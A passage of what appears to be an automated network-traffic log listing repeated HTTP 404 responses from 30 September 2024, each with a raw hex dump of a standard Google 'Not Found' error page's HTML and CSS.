64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:06 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:08 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:09 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:11 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:12 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:13 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 